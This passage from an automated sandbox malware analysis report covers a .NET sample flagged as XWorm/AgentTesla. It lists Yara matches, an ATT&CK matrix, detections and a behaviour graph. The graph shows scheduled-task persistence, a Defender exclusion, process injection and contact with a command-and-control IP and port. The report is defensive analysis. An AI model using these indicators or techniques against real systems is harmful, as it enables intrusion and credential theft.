              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Users\user\Desktop\9758xBqgE1azKnB.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exeQueries volume information: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exe VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exeQueries volume information: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exe VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeQueries volume information: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe VolumeInformation
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeQueries volume information: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe VolumeInformation
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeQueries volume information: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe VolumeInformation
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeQueries volume information: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe VolumeInformation
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              Source: Amcache.hve.28.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
              Source: Amcache.hve.28.drBinary or memory string: msmpeng.exe
              Source: Amcache.hve.28.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
              Source: 9758xBqgE1azKnB.exe, 00000007.00000002.3824966064.0000000001507000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
              Source: Amcache.hve.28.drBinary or memory string: MsMpEng.exe
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

              Stealing of Sensitive Information

              barindex
              Yara detected XWorm
              Source: Yara matchFile source: 8.2.grjujyNaBLaKbU.exe.2bd2aa4.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.9758xBqgE1azKnB.exe.30b13e0.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.grjujyNaBLaKbU.exe.2bdbb84.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 14.2.9758xBqgE1azKnB.exe.2eb9b8c.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.grjujyNaBLaKbU.exe.2bd2aa4.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 13.2.grjujyNaBLaKbU.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.grjujyNaBLaKbU.exe.2bdbb84.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.9758xBqgE1azKnB.exe.30a8300.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 14.2.9758xBqgE1azKnB.exe.2eb0aac.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.9758xBqgE1azKnB.exe.30b13e0.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.9758xBqgE1azKnB.exe.30a8300.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 14.2.9758xBqgE1azKnB.exe.2eb0aac.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 14.2.9758xBqgE1azKnB.exe.2eb9b8c.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0000000D.00000002.1753363260.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.1747690067.0000000002BCA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000E.00000002.1850299737.0000000002E55000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1714031582.000000000309C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.3827541610.00000000032A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: 9758xBqgE1azKnB.exe PID: 7128, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: 9758xBqgE1azKnB.exe PID: 6912, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: grjujyNaBLaKbU.exe PID: 888, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: grjujyNaBLaKbU.exe PID: 7400, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: 9758xBqgE1azKnB.exe PID: 7568, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Yara detected XWorm
              Source: Yara matchFile source: 8.2.grjujyNaBLaKbU.exe.2bd2aa4.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.9758xBqgE1azKnB.exe.30b13e0.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.grjujyNaBLaKbU.exe.2bdbb84.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 14.2.9758xBqgE1azKnB.exe.2eb9b8c.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.grjujyNaBLaKbU.exe.2bd2aa4.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 13.2.grjujyNaBLaKbU.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.grjujyNaBLaKbU.exe.2bdbb84.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.9758xBqgE1azKnB.exe.30a8300.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 14.2.9758xBqgE1azKnB.exe.2eb0aac.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.9758xBqgE1azKnB.exe.30b13e0.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.9758xBqgE1azKnB.exe.30a8300.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 14.2.9758xBqgE1azKnB.exe.2eb0aac.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 14.2.9758xBqgE1azKnB.exe.2eb9b8c.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0000000D.00000002.1753363260.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.1747690067.0000000002BCA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000E.00000002.1850299737.0000000002E55000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1714031582.000000000309C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.3827541610.00000000032A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: 9758xBqgE1azKnB.exe PID: 7128, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: 9758xBqgE1azKnB.exe PID: 6912, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: grjujyNaBLaKbU.exe PID: 888, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: grjujyNaBLaKbU.exe PID: 7400, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: 9758xBqgE1azKnB.exe PID: 7568, type: MEMORYSTR

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
              Windows Management Instrumentation              		1
              Scheduled Task/Job              		112
              Process Injection              		1
              Masquerading              		1
              Input Capture              		121
              Security Software Discovery              		Remote Services1
              Input Capture              		1
              Encrypted Channel              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts1
              Scheduled Task/Job              		21
              Registry Run Keys / Startup Folder              		1
              Scheduled Task/Job              		11
              Disable or Modify Tools              		LSASS Memory2
              Process Discovery              		Remote Desktop Protocol11
              Archive Collected Data              		1
              Non-Standard Port              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAt1
              DLL Side-Loading              		21
              Registry Run Keys / Startup Folder              		31
              Virtualization/Sandbox Evasion              		Security Account Manager31
              Virtualization/Sandbox Evasion              		SMB/Windows Admin SharesData from Network Shared Drive1
              Application Layer Protocol              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
              DLL Side-Loading              		112
              Process Injection              		NTDS1
              Application Window Discovery              		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Deobfuscate/Decode Files or Information              		LSA Secrets1
              File and Directory Discovery              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
              Obfuscated Files or Information              		Cached Domain Credentials13
              System Information Discovery              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items22
              Software Packing              		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
              DLL Side-Loading              		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 signatures2 2 Behavior Graph ID: 1562040 Sample: 9758xBqgE1azKnB.exe Startdate: 25/11/2024 Architecture: WINDOWS Score: 100 64 Suricata IDS alerts for network traffic 2->64 66 Found malware configuration 2->66 68 Malicious sample detected (through community Yara rule) 2->68 70 12 other signatures 2->70 7 9758xBqgE1azKnB.exe 7 2->7         started        11 grjujyNaBLaKbU.exe 5 2->11         started        13 9758xBqgE1azKnB.exe 2->13         started        15 9758xBqgE1azKnB.exe 2->15         started        process3 file4 54 C:\Users\user\AppData\...\grjujyNaBLaKbU.exe, PE32 7->54 dropped 56 C:\...\grjujyNaBLaKbU.exe:Zone.Identifier, ASCII 7->56 dropped 58 C:\Users\user\AppData\Local\...\tmpAD87.tmp, XML 7->58 dropped 60 C:\Users\user\...\9758xBqgE1azKnB.exe.log, ASCII 7->60 dropped 76 Uses schtasks.exe or at.exe to add and modify task schedules 7->76 78 Adds a directory exclusion to Windows Defender 7->78 80 Injects a PE file into a foreign processes 7->80 17 9758xBqgE1azKnB.exe 1 7 7->17         started        22 powershell.exe 23 7->22         started        24 schtasks.exe 1 7->24         started        26 9758xBqgE1azKnB.exe 7->26         started        82 Multi AV Scanner detection for dropped file 11->82 84 Machine Learning detection for dropped file 11->84 28 schtasks.exe 1 11->28         started        34 2 other processes 11->34 30 schtasks.exe 13->30         started        32 9758xBqgE1azKnB.exe 13->32         started        36 2 other processes 15->36 signatures5 process6 dnsIp7 62 18.181.154.24, 49735, 7000 AMAZON-02US United States 17->62 52 C:\Users\user\AppData\...\9758xBqgE1azKnB.exe, PE32 17->52 dropped 72 Protects its processes via BreakOnTermination flag 17->72 38 WerFault.exe 17->38         started        74 Loading BitLocker PowerShell Module 22->74 40 WmiPrvSE.exe 22->40         started        42 conhost.exe 22->42         started        44 conhost.exe 24->44         started        46 conhost.exe 28->46         started        48 conhost.exe 30->48         started        50 conhost.exe 36->50         started        file8 signatures9 process10

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              9758xBqgE1azKnB.exe58%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
              9758xBqgE1azKnB.exe55%VirustotalBrowse
              9758xBqgE1azKnB.exe100%Joe Sandbox ML

              Dropped Files

              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exe100%Joe Sandbox ML
              C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe100%Joe Sandbox ML
              C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe58%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
              C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe55%VirustotalBrowse
              C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exe58%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
              C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exe55%VirustotalBrowse

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              18.181.154.240%Avira URL Cloudsafe

              Domains and IPs

              Contacted Domains

              No contacted domains info

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              18.181.154.24true
              • Avira URL Cloud: safe
              		unknown

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              http://www.apache.org/licenses/LICENSE-2.09758xBqgE1azKnB.exe, 00000000.00000002.1715832568.00000000071A2000.00000004.00000800.00020000.00000000.sdmpfalse
                		high
                http://www.fontbureau.com9758xBqgE1azKnB.exe, 00000000.00000002.1715832568.00000000071A2000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high
                  http://www.fontbureau.com/designersG9758xBqgE1azKnB.exe, 00000000.00000002.1715832568.00000000071A2000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    http://www.fontbureau.com/designers/?9758xBqgE1azKnB.exe, 00000000.00000002.1715832568.00000000071A2000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      http://www.founder.com.cn/cn/bThe9758xBqgE1azKnB.exe, 00000000.00000002.1715832568.00000000071A2000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        http://www.fontbureau.com/designers?9758xBqgE1azKnB.exe, 00000000.00000002.1715832568.00000000071A2000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          http://www.tiro.com9758xBqgE1azKnB.exe, 00000000.00000002.1715832568.00000000071A2000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            http://upx.sf.netAmcache.hve.28.drfalse
                              		high
                              http://www.fontbureau.com/designers9758xBqgE1azKnB.exe, 00000000.00000002.1715832568.00000000071A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://www.goodfont.co.kr9758xBqgE1azKnB.exe, 00000000.00000002.1715832568.00000000071A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://tempuri.org/project_mgtDataSet.xsdOproject_mgt_system.Properties.Resources9758xBqgE1azKnB.exe, grjujyNaBLaKbU.exe.0.dr, 9758xBqgE1azKnB.exe.7.drfalse
                                    		high
                                    http://www.carterandcone.coml9758xBqgE1azKnB.exe, 00000000.00000002.1715832568.00000000071A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://www.sajatypeworks.com9758xBqgE1azKnB.exe, 00000000.00000002.1715832568.00000000071A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://www.typography.netD9758xBqgE1azKnB.exe, 00000000.00000002.1715832568.00000000071A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
